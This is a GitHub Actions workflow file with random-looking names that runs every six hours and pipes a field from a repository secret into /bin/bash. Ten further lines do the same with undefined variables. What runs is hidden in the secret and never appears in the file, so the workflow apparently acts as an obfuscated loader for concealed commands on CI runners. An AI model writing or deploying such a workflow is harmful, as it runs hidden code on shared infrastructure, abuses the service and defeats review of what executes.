name: youngroundyy
on:
  workflow_dispatch:
  schedule:
    - cron: '5 5/6 * * *'
jobs:  # 3997
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: youngroundyy
        env:
          ctpua612: ${{ secrets.ctpua612 }}
        run: |
          echo $ctpua612 | jq -r .gqeq064 | /bin/bash
          echo $utqtr577 | jq -r .dzjv3 | /bin/bash
          echo $n6319 | jq -r .yxpev53683 | /bin/bash
          echo $znb1 | jq -r .is847 | /bin/bash
          echo $odxwv71891 | jq -r .v1 | /bin/bash
          echo $qimkx7567 | jq -r .zqw12 | /bin/bash
          echo $lrct582 | jq -r .hmrlp55 | /bin/bash
          echo $qtj33 | jq -r .omx9997 | /bin/bash
          echo $lmf4031 | jq -r .cviw831 | /bin/bash
          echo $h01163 | jq -r .ezl59902 | /bin/bash
          echo $sswmo089 | jq -r .zbymx432 | /bin/bash

